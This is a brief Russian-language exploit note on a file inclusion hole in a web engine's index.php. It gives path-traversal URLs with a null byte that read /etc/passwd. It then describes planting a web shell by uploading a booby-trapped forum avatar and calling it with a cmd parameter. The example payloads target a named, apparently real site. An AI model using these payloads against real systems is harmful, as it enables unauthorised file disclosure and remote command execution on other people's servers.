Уязвимость находится в сценарии index.php и позволяет получить содержимое любого файла (кроме .php).
http://site.com/index.php?ind=../../../../../../../../../../../../etc/passwd%00
С помощью данного бага становится элементарным получить полноценный веб-шелл на системе.
Регистрируемся на форуме (он идет в комплекте вместе с движком), заливаем в качестве аватара картинку,
содержащую код веб-шелла и вызываем её вышеописанным способом, добавляя необходимые параметры.
Пример:
http://blackrose.nl/?ind=../../../../../../../../../../../../etc/passwd%00
http://blackrose.nl/?ind=../../forum/uploads/AVATAR_name.gif%00&cmd=ls -la
